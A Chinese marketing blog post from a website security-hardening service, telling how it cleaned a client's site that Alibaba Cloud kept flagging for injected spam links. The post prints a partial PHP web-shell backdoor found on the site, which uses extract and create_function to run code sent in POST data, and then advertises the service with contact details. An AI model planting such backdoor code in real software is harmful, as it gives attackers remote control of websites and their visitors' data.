- A+
我们网站老是被挂马,而且链接网站里面也没有,但是阿里那边一直给发挂马邮件 ,得得的后台 这个可以处理吗?
今天我们 360°网站安全加固 收到客户一大早联系我们 说遇到问题了,
这些链接网站里面找不到但是老被挂
有售后吧
行,主要别处理完还被挂
于是,客户提供我们主机信息, FTP 账号密码, 我们技术人员立马进行排查问题
经过半小时排查,我们找到了问题的根本原因,截图给客户看,大概如下
客户的网站代码中 被植入了 远程后门, 部分代码如下
@extract(array(b=>create_function(NULL,fun2())));
@extract(array(c=>$b()));
function fun2(){
$b=$_POST;
return @($b
下载密码:发表评论并刷新可见!
);
这才是导致问题的根本原因,
于是 我们技术 把这些垃圾代码,处理以后,在进行全面的2次检查,修复,加固程序,最终解决问题
阿里处罚分析:从本次事件可以看出,阿里是对存在问题的文章进行了屏蔽,对于域名下的其它正常 页面是正常访问的,这点还是比较人道的。
所以在这里 360°网站安全加固 呼吁 各位站长 一定要注意网站服务器安全,以免这样出现被黑入侵 ,长期不处理,阿里云是会永久给贵站屏蔽 不让使用的 后果相当严重
对于 程序代码上的漏洞,需要有安全意识,懂程序代码的程序员才能修复的了,如果自己不懂程序代码,也可以找一些安全公司来解决,比如我们 360°网站安全加固
- 微信 wzgj360
- 联系免费答疑
-
- QQ 613049615
- 联系免费答疑
-
